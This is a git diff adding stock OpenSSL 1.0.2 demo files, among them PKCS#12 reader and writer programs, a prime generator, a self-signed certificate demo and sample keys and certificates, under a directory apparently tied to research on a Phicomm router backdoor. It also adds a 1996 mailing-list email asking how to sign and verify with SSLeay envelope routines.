+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_ZENCOD_ERR_H
+# define HEADER_ZENCOD_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_ZENCOD_strings(void);
+static void ERR_unload_ZENCOD_strings(void);
+static void ERR_ZENCOD_error(int function, int reason, char *file, int line);
+# define ZENCODerr(f,r) ERR_ZENCOD_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the ZENCOD functions. */
+
+/* Function codes. */
+# define ZENCOD_F_ZENCOD_BN_MOD_EXP                       100
+# define ZENCOD_F_ZENCOD_CTRL                             101
+# define ZENCOD_F_ZENCOD_DH_COMPUTE                       102
+# define ZENCOD_F_ZENCOD_DH_GENERATE                      103
+# define ZENCOD_F_ZENCOD_DSA_DO_SIGN                      104
+# define ZENCOD_F_ZENCOD_DSA_DO_VERIFY                    105
+# define ZENCOD_F_ZENCOD_FINISH                           106
+# define ZENCOD_F_ZENCOD_INIT                             107
+# define ZENCOD_F_ZENCOD_RAND                             108
+# define ZENCOD_F_ZENCOD_RSA_MOD_EXP                      109
+# define ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT                  110
+
+/* Reason codes. */
+# define ZENCOD_R_ALREADY_LOADED                          100
+# define ZENCOD_R_BAD_KEY_COMPONENTS                      101
+# define ZENCOD_R_BN_EXPAND_FAIL                          102
+# define ZENCOD_R_CTRL_COMMAND_NOT_IMPLEMENTED            103
+# define ZENCOD_R_DSO_FAILURE                             104
+# define ZENCOD_R_NOT_LOADED                              105
+# define ZENCOD_R_REQUEST_FAILED                          106
+# define ZENCOD_R_UNIT_FAILURE                            107
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/README
new file mode 100644
index 0000000..c87434b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/README
@@ -0,0 +1,3 @@
+PKCS#12 demo applications
+
+Written by Steve Henson.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkread.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkread.c
new file mode 100644
index 0000000..f4a3df4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkread.c
@@ -0,0 +1,61 @@
+/* pkread.c */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/pkcs12.h>
+
+/* Simple PKCS#12 file reader */
+
+int main(int argc, char **argv)
+{
+    FILE *fp;
+    EVP_PKEY *pkey;
+    X509 *cert;
+    STACK_OF(X509) *ca = NULL;
+    PKCS12 *p12;
+    int i;
+    if (argc != 4) {
+        fprintf(stderr, "Usage: pkread p12file password opfile\n");
+        exit(1);
+    }
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+    if (!(fp = fopen(argv[1], "rb"))) {
+        fprintf(stderr, "Error opening file %s\n", argv[1]);
+        exit(1);
+    }
+    p12 = d2i_PKCS12_fp(fp, NULL);
+    fclose(fp);
+    if (!p12) {
+        fprintf(stderr, "Error reading PKCS#12 file\n");
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    if (!PKCS12_parse(p12, argv[2], &pkey, &cert, &ca)) {
+        fprintf(stderr, "Error parsing PKCS#12 file\n");
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    PKCS12_free(p12);
+    if (!(fp = fopen(argv[3], "w"))) {
+        fprintf(stderr, "Error opening file %s\n", argv[1]);
+        exit(1);
+    }
+    if (pkey) {
+        fprintf(fp, "***Private Key***\n");
+        PEM_write_PrivateKey(fp, pkey, NULL, NULL, 0, NULL, NULL);
+    }
+    if (cert) {
+        fprintf(fp, "***User Certificate***\n");
+        PEM_write_X509_AUX(fp, cert);
+    }
+    if (ca && sk_X509_num(ca)) {
+        fprintf(fp, "***Other Certificates***\n");
+        for (i = 0; i < sk_X509_num(ca); i++)
+            PEM_write_X509_AUX(fp, sk_X509_value(ca, i));
+    }
+    fclose(fp);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkwrite.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkwrite.c
new file mode 100644
index 0000000..fed773e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/pkcs12/pkwrite.c
@@ -0,0 +1,46 @@
+/* pkwrite.c */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/pem.h>
+#include <openssl/err.h>
+#include <openssl/pkcs12.h>
+
+/* Simple PKCS#12 file creator */
+
+int main(int argc, char **argv)
+{
+    FILE *fp;
+    EVP_PKEY *pkey;
+    X509 *cert;
+    PKCS12 *p12;
+    if (argc != 5) {
+        fprintf(stderr, "Usage: pkwrite infile password name p12file\n");
+        exit(1);
+    }
+    SSLeay_add_all_algorithms();
+    ERR_load_crypto_strings();
+    if (!(fp = fopen(argv[1], "r"))) {
+        fprintf(stderr, "Error opening file %s\n", argv[1]);
+        exit(1);
+    }
+    cert = PEM_read_X509(fp, NULL, NULL, NULL);
+    rewind(fp);
+    pkey = PEM_read_PrivateKey(fp, NULL, NULL, NULL);
+    fclose(fp);
+    p12 = PKCS12_create(argv[2], argv[3], pkey, cert, NULL, 0, 0, 0, 0, 0);
+    if (!p12) {
+        fprintf(stderr, "Error creating PKCS#12 structure\n");
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    if (!(fp = fopen(argv[4], "wb"))) {
+        fprintf(stderr, "Error opening file %s\n", argv[1]);
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+    i2d_PKCS12_fp(fp, p12);
+    PKCS12_free(p12);
+    fclose(fp);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/Makefile
new file mode 100644
index 0000000..0166cd4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/Makefile
@@ -0,0 +1,20 @@
+CC=cc
+CFLAGS= -g -I../../include -Wall
+LIBS=  -L../.. -lcrypto
+EXAMPLES=prime
+
+all: $(EXAMPLES) 
+
+prime: prime.o
+	$(CC) -o prime prime.o $(LIBS)
+
+clean:	
+	rm -f $(EXAMPLES) *.o
+
+test: all
+	@echo Test creating a 128-bit prime
+	./prime 128
+	@echo Test creating a 256-bit prime
+	./prime 256
+	@echo Test creating a 512-bit prime
+	./prime 512
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/prime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/prime.c
new file mode 100644
index 0000000..6dd0228
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/prime/prime.c
@@ -0,0 +1,102 @@
+/* demos/prime/prime.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/bn.h>
+
+void callback(type, num)
+int type, num;
+{
+    if (type == 0)
+        fprintf(stderr, ".");
+    else if (type == 1)
+        fprintf(stderr, "+");
+    else if (type == 2)
+        fprintf(stderr, "*");
+    fflush(stderr);
+}
+
+int main(argc, argv)
+int argc;
+char *argv[];
+{
+    BIGNUM *rand;
+    int num = 256;
+
+    /*
+     * we should really call RAND_seed(char *bytes,int num); to fully
+     * initalise the random number generator
+     */
+    if (argc >= 2) {
+        num = atoi(argv[1]);
+        if (num == 0)
+            num = 256;
+    }
+
+    fprintf(stderr, "generate a strong prime\n");
+    rand = BN_generate_prime(NULL, num, 1, NULL, NULL, callback, NULL);
+    /* change the third parameter to 1 for a strong prime */
+    fprintf(stderr, "\n");
+
+    BN_print_fp(stdout, rand);
+    fprintf(stdout, "\n");
+    BN_free(rand);
+    exit(0);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/privkey.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/privkey.pem
new file mode 100644
index 0000000..ddae240
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/privkey.pem
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBAN+FmbxmHVOp/RxtpMGz0DvQEBz1sDktHp19hIoMSu0YZift5MAu
+4xAEJYvWVCshDiyOTWsUBXwZkrkt87FyctkCAwEAAQJAG/vxBGpQb6IPo1iC0RF/
+F430BnwoBPCGLbeCOXpSgx5X+19vuTSdEqMgeNB6+aNb+XY/7mvVfCjyD6WZ0oxs
+JQIhAPO+uL9cP40lFs62pdL3QSWsh3VNDByvOtr9LpeaxBm/AiEA6sKVfXsDQ5hd
+SHt9U61r2r8Lcxmzi9Kw6JNqjMmzqWcCIQCKoRy+aZ8Tjdas9yDVHh+FZ90bEBkl
+b1xQFNOdEj8aTQIhAOJWrO6INYNsWTPS6+hLYZtLamyUsQj0H+B8kNQge/mtAiEA
+nBfvUl243qbqN8gF7Az1u33uc9FsPVvQPiBzLxZ4ixw=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/selfsign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/selfsign.c
new file mode 100644
index 0000000..d611334
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/selfsign.c
@@ -0,0 +1,176 @@
+/* NOCW */
+/* cc -o ssdemo -I../include selfsign.c ../libcrypto.a */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <openssl/pem.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+int mkit(X509 **x509p, EVP_PKEY **pkeyp, int bits, int serial, int days);
+
+int main()
+{
+    BIO *bio_err;
+    X509 *x509 = NULL;
+    EVP_PKEY *pkey = NULL;
+
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    mkit(&x509, &pkey, 512, 0, 365);
+
+    RSA_print_fp(stdout, pkey->pkey.rsa, 0);
+    X509_print_fp(stdout, x509);
+
+    PEM_write_PrivateKey(stdout, pkey, NULL, NULL, 0, NULL, NULL);
+    PEM_write_X509(stdout, x509);
+
+    X509_free(x509);
+    EVP_PKEY_free(pkey);
+
+#ifdef CUSTOM_EXT
+    /* Only needed if we add objects or custom extensions */
+    X509V3_EXT_cleanup();
+    OBJ_cleanup();
+#endif
+
+    CRYPTO_mem_leaks(bio_err);
+    BIO_free(bio_err);
+    return (0);
+}
+
+#ifdef WIN16
+# define MS_CALLBACK   _far _loadds
+# define MS_FAR        _far
+#else
+# define MS_CALLBACK
+# define MS_FAR
+#endif
+
+static void MS_CALLBACK callback(p, n, arg)
+int p;
+int n;
+void *arg;
+{
+    char c = 'B';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    fputc(c, stderr);
+}
+
+int mkit(x509p, pkeyp, bits, serial, days)
+X509 **x509p;
+EVP_PKEY **pkeyp;
+int bits;
+int serial;
+int days;
+{
+    X509 *x;
+    EVP_PKEY *pk;
+    RSA *rsa;
+    X509_NAME *name = NULL;
+    X509_NAME_ENTRY *ne = NULL;
+    X509_EXTENSION *ex = NULL;
+
+    if ((pkeyp == NULL) || (*pkeyp == NULL)) {
+        if ((pk = EVP_PKEY_new()) == NULL) {
+            abort();
+            return (0);
+        }
+    } else
+        pk = *pkeyp;
+
+    if ((x509p == NULL) || (*x509p == NULL)) {
+        if ((x = X509_new()) == NULL)
+            goto err;
+    } else
+        x = *x509p;
+
+    rsa = RSA_generate_key(bits, RSA_F4, callback, NULL);
+    if (!EVP_PKEY_assign_RSA(pk, rsa)) {
+        abort();
+        goto err;
+    }
+    rsa = NULL;
+
+    X509_set_version(x, 3);
+    ASN1_INTEGER_set(X509_get_serialNumber(x), serial);
+    X509_gmtime_adj(X509_get_notBefore(x), 0);
+    X509_gmtime_adj(X509_get_notAfter(x), (long)60 * 60 * 24 * days);
+    X509_set_pubkey(x, pk);
+
+    name = X509_get_subject_name(x);
+
+    /*
+     * This function creates and adds the entry, working out the correct
+     * string type and performing checks on its length. Normally we'd check
+     * the return value for errors...
+     */
+    X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, "UK", -1, -1, 0);
+    X509_NAME_add_entry_by_txt(name, "CN",
+                               MBSTRING_ASC, "OpenSSL Group", -1, -1, 0);
+
+    X509_set_issuer_name(x, name);
+
+    /*
+     * Add extension using V3 code: we can set the config file as NULL
+     * because we wont reference any other sections. We can also set the
+     * context to NULL because none of these extensions below will need to
+     * access it.
+     */
+
+    ex = X509V3_EXT_conf_nid(NULL, NULL, NID_netscape_cert_type, "server");
+    X509_add_ext(x, ex, -1);
+    X509_EXTENSION_free(ex);
+
+    ex = X509V3_EXT_conf_nid(NULL, NULL, NID_netscape_comment,
+                             "example comment extension");
+    X509_add_ext(x, ex, -1);
+    X509_EXTENSION_free(ex);
+
+    ex = X509V3_EXT_conf_nid(NULL, NULL, NID_netscape_ssl_server_name,
+                             "www.openssl.org");
+
+    X509_add_ext(x, ex, -1);
+    X509_EXTENSION_free(ex);
+
+#if 0
+    /* might want something like this too.... */
+    ex = X509V3_EXT_conf_nid(NULL, NULL, NID_basic_constraints,
+                             "critical,CA:TRUE");
+
+    X509_add_ext(x, ex, -1);
+    X509_EXTENSION_free(ex);
+#endif
+
+#ifdef CUSTOM_EXT
+    /* Maybe even add our own extension based on existing */
+    {
+        int nid;
+        nid = OBJ_create("1.2.3.4", "MyAlias", "My Test Alias Extension");
+        X509V3_EXT_add_alias(nid, NID_netscape_comment);
+        ex = X509V3_EXT_conf_nid(NULL, NULL, nid, "example comment alias");
+        X509_add_ext(x, ex, -1);
+        X509_EXTENSION_free(ex);
+    }
+#endif
+
+    if (!X509_sign(x, pk, EVP_md5()))
+        goto err;
+
+    *x509p = x;
+    *pkeyp = pk;
+    return (1);
+ err:
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/Makefile
new file mode 100644
index 0000000..e6d391e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/Makefile
@@ -0,0 +1,15 @@
+CC=cc
+CFLAGS= -g -I../../include -Wall
+LIBS=  -L../.. -lcrypto
+EXAMPLES=sign
+
+all: $(EXAMPLES) 
+
+sign: sign.o
+	$(CC) -o sign sign.o $(LIBS)
+
+clean:	
+	rm -f $(EXAMPLES) *.o
+
+test: all
+	./sign
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/cert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/cert.pem
new file mode 100644
index 0000000..9d7ac23
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/cert.pem
@@ -0,0 +1,14 @@
+-----BEGIN CERTIFICATE-----
+MIICLDCCAdYCAQAwDQYJKoZIhvcNAQEEBQAwgaAxCzAJBgNVBAYTAlBUMRMwEQYD
+VQQIEwpRdWVlbnNsYW5kMQ8wDQYDVQQHEwZMaXNib2ExFzAVBgNVBAoTDk5ldXJv
+bmlvLCBMZGEuMRgwFgYDVQQLEw9EZXNlbnZvbHZpbWVudG8xGzAZBgNVBAMTEmJy
+dXR1cy5uZXVyb25pby5wdDEbMBkGCSqGSIb3DQEJARYMc2FtcG9AaWtpLmZpMB4X
+DTk2MDkwNTAzNDI0M1oXDTk2MTAwNTAzNDI0M1owgaAxCzAJBgNVBAYTAlBUMRMw
+EQYDVQQIEwpRdWVlbnNsYW5kMQ8wDQYDVQQHEwZMaXNib2ExFzAVBgNVBAoTDk5l
+dXJvbmlvLCBMZGEuMRgwFgYDVQQLEw9EZXNlbnZvbHZpbWVudG8xGzAZBgNVBAMT
+EmJydXR1cy5uZXVyb25pby5wdDEbMBkGCSqGSIb3DQEJARYMc2FtcG9AaWtpLmZp
+MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL7+aty3S1iBA/+yxjxv4q1MUTd1kjNw
+L4lYKbpzzlmC5beaQXeQ2RmGMTXU+mDvuqItjVHOK3DvPK7lTcSGftUCAwEAATAN
+BgkqhkiG9w0BAQQFAANBAFqPEKFjk6T6CKTHvaQeEAsX0/8YHPHqH/9AnhSjrwuX
+9EBc0n6bVGhN7XaXd6sJ7dym9sbsWxb+pJdurnkxjx4=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/key.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/key.pem
new file mode 100644
index 0000000..239ad66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/key.pem
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBAL7+aty3S1iBA/+yxjxv4q1MUTd1kjNwL4lYKbpzzlmC5beaQXeQ
+2RmGMTXU+mDvuqItjVHOK3DvPK7lTcSGftUCAwEAAQJBALjkK+jc2+iihI98riEF
+oudmkNziSRTYjnwjx8mCoAjPWviB3c742eO3FG4/soi1jD9A5alihEOXfUzloenr
+8IECIQD3B5+0l+68BA/6d76iUNqAAV8djGTzvxnCxycnxPQydQIhAMXt4trUI3nc
+a+U8YL2HPFA3gmhBsSICbq2OptOCnM7hAiEA6Xi3JIQECob8YwkRj29DU3/4WYD7
+WLPgsQpwo1GuSpECICGsnWH5oaeD9t9jbFoSfhJvv0IZmxdcLpRcpslpeWBBAiEA
+6/5B8J0GHdJq89FHwEG/H2eVVUYu5y/aD6sgcm+0Avg=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sig.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sig.txt
new file mode 100644
index 0000000..5613c0e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/sign/sig.txt
@@ -0,0 +1,158 @@
+From ssl-lists-owner@mincom.com Mon Sep 30 02:37:40 1996
+Received: from cygnus.mincom.oz.au by orb.mincom.oz.au with SMTP id AA11782
+  (5.65c/IDA-1.4.4 for eay); Mon, 30 Sep 1996 11:46:21 +1000
+Received: (from daemon@localhost) by cygnus.mincom.oz.au (8.7.5/8.7.3) id LAA18980 for ssl-users-outgoing; Mon, 30 Sep 1996 11:44:56 +1000 (EST)
+Received: from minbne.mincom.oz.au (minbne.mincom.oz.au [192.55.196.247]) by cygnus.mincom.oz.au (8.7.5/8.7.3) with SMTP id LAA18962 for <ssl-users@listserv.mincom.oz.au>; Mon, 30 Sep 1996 11:44:51 +1000 (EST)
+Received: by minbne.mincom.oz.au id AA22230
+  (5.65c/IDA-1.4.4 for ssl-users@listserv.mincom.oz.au); Mon, 30 Sep 1996 11:38:41 +1000
+Received: from brutus.neuronio.pt (brutus.neuronio.pt [193.126.253.2]) by bunyip.cc.uq.oz.au (8.7.6/8.7.3) with SMTP id LAA15824 for <ssl-users@mincom.com>; Mon, 30 Sep 1996 11:40:07 +1000
+Received: (from sampo@localhost) by brutus.neuronio.pt (8.6.11/8.6.11) id BAA08729; Mon, 30 Sep 1996 01:37:40 +0100
+Date: Mon, 30 Sep 1996 01:37:40 +0100
+Message-Id: <199609300037.BAA08729@brutus.neuronio.pt>
+From: Sampo Kellomaki <sampo@neuronio.pt>
+To: ssl-users@mincom.com
+Cc: sampo@brutus.neuronio.pt
+Subject: Signing with envelope routines
+Sender: ssl-lists-owner@mincom.com
+Precedence: bulk
+Status: RO
+X-Status: D
+
+
+I have been trying to figure out how to produce signatures with EVP_
+routines. I seem to be able to read in private key and sign some
+data ok, but I can't figure out how I am supposed to read in
+public key so that I could verify my signature. I use self signed
+certificate.
+
+I figured I should use
+	EVP_PKEY* pkey = PEM_ASN1_read(d2i_PrivateKey, PEM_STRING_EVP_PKEY,
+	                               fp, NULL, NULL);
+to read in private key and this seems to work Ok.
+
+However when I try analogous
+	EVP_PKEY* pkey = PEM_ASN1_read(d2i_PublicKey, PEM_STRING_X509,
+	                               fp, NULL, NULL);
+the program fails with
+
+error:0D09508D:asn1 encoding routines:D2I_PUBLICKEY:unknown public key type:d2i_pu.c:93
+error:0906700D:PEM routines:PEM_ASN1_read_bio:ASN1 lib:pem_lib.c:232
+
+I figured that the second argument to PEM_ASN1_read should match the
+name in my PEM encoded object, hence PEM_STRING_X509.
+PEM_STRING_EVP_PKEY seems to be somehow magical
+because it matches whatever private key there happens to be. I could
+not find a similar constant to use with getting the certificate, however.
+
+Is my approach of using PEM_ASN1_read correct? What should I pass in
+as name?  Can I use normal (or even self signed) X509 certificate for
+verifying the signature?
+
+When will SSLeay documentation be written ;-)? If I would contribute
+comments to the code, would Eric take time to review them and include
+them in distribution?
+
+I'm using SSLeay-0.6.4. My program is included below along with the
+key and cert that I use.
+
+--Sampo
+
+-----------------------------------
+/* sign-it.cpp  -  Simple test app using SSLeay envelopes to sign data
+   29.9.1996, Sampo Kellomaki <sampo@iki.fi> */
+
+#include <stdio.h>
+#include "rsa.h"
+#include "evp.h"
+#include "objects.h"
+#include "x509.h"
+#include "err.h"
+#include "pem.h"
+#include "ssl.h"
+
+void main ()
+{
+  int err;
+  int sig_len;
+  unsigned char sig_buf [4096];
+  const char certfile[] = "plain-cert.pem";
+  const char keyfile[]  = "plain-key.pem";
+  const char data[]     = "I owe you...";
+  EVP_MD_CTX     md_ctx;
+  EVP_PKEY*      pkey;
+  FILE*          fp;
+
+  SSL_load_error_strings();
+  
+  /* Read private key */
+  
+  fp = fopen (keyfile, "r");   if (fp == NULL) exit (1);
+  pkey = (EVP_PKEY*)PEM_ASN1_read ((char *(*)())d2i_PrivateKey,
+				   PEM_STRING_EVP_PKEY,
+				   fp,
+				   NULL, NULL);
+  if (pkey == NULL) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  fclose (fp);
+  
+  /* Do the signature */
+  
+  EVP_SignInit   (&md_ctx, EVP_md5());
+  EVP_SignUpdate (&md_ctx, data, strlen(data));
+  sig_len = sizeof(sig_buf);
+  err = EVP_SignFinal (&md_ctx,
+		       sig_buf, 
+		       &sig_len,
+		       pkey);
+  if (err != 1) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  EVP_PKEY_free (pkey);
+  
+  /* Read public key */
+  
+  fp = fopen (certfile, "r");   if (fp == NULL) exit (1);
+  pkey = (EVP_PKEY*)PEM_ASN1_read ((char *(*)())d2i_PublicKey,
+				   PEM_STRING_X509,
+				   fp,
+				   NULL, NULL);
+  if (pkey == NULL) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  fclose (fp);
+  
+  /* Verify the signature */
+  
+  EVP_VerifyInit   (&md_ctx, EVP_md5());
+  EVP_VerifyUpdate (&md_ctx, data, strlen((char*)data));
+  err = EVP_VerifyFinal (&md_ctx,
+			 sig_buf,
+			 sig_len,
+			 pkey);
+  if (err != 1) {  ERR_print_errors_fp (stderr);    exit (1);  }
+  EVP_PKEY_free (pkey);
+  printf ("Signature Verified Ok.\n");
+}
+/* EOF */
+--------------- plain-cert.pem -----------------
+-----BEGIN CERTIFICATE-----
+MIICLDCCAdYCAQAwDQYJKoZIhvcNAQEEBQAwgaAxCzAJBgNVBAYTAlBUMRMwEQYD
+VQQIEwpRdWVlbnNsYW5kMQ8wDQYDVQQHEwZMaXNib2ExFzAVBgNVBAoTDk5ldXJv
+bmlvLCBMZGEuMRgwFgYDVQQLEw9EZXNlbnZvbHZpbWVudG8xGzAZBgNVBAMTEmJy
+dXR1cy5uZXVyb25pby5wdDEbMBkGCSqGSIb3DQEJARYMc2FtcG9AaWtpLmZpMB4X
+DTk2MDkwNTAzNDI0M1oXDTk2MTAwNTAzNDI0M1owgaAxCzAJBgNVBAYTAlBUMRMw
+EQYDVQQIEwpRdWVlbnNsYW5kMQ8wDQYDVQQHEwZMaXNib2ExFzAVBgNVBAoTDk5l
+dXJvbmlvLCBMZGEuMRgwFgYDVQQLEw9EZXNlbnZvbHZpbWVudG8xGzAZBgNVBAMT
+EmJydXR1cy5uZXVyb25pby5wdDEbMBkGCSqGSIb3DQEJARYMc2FtcG9AaWtpLmZp
+MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL7+aty3S1iBA/+yxjxv4q1MUTd1kjNw
+L4lYKbpzzlmC5beaQXeQ2RmGMTXU+mDvuqItjVHOK3DvPK7lTcSGftUCAwEAATAN
+BgkqhkiG9w0BAQQFAANBAFqPEKFjk6T6CKTHvaQeEAsX0/8YHPHqH/9AnhSjrwuX
+9EBc0n6bVGhN7XaXd6sJ7dym9sbsWxb+pJdurnkxjx4=
+-----END CERTIFICATE-----
+---------------- plain-key.pem -----------------
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBAL7+aty3S1iBA/+yxjxv4q1MUTd1kjNwL4lYKbpzzlmC5beaQXeQ
+2RmGMTXU+mDvuqItjVHOK3DvPK7lTcSGftUCAwEAAQJBALjkK+jc2+iihI98riEF
+oudmkNziSRTYjnwjx8mCoAjPWviB3c742eO3FG4/soi1jD9A5alihEOXfUzloenr
+8IECIQD3B5+0l+68BA/6d76iUNqAAV8djGTzvxnCxycnxPQydQIhAMXt4trUI3nc
+a+U8YL2HPFA3gmhBsSICbq2OptOCnM7hAiEA6Xi3JIQECob8YwkRj29DU3/4WYD7
+WLPgsQpwo1GuSpECICGsnWH5oaeD9t9jbFoSfhJvv0IZmxdcLpRcpslpeWBBAiEA
+6/5B8J0GHdJq89FHwEG/H2eVVUYu5y/aD6sgcm+0Avg=
+-----END RSA PRIVATE KEY-----
+------------------------------------------------
+
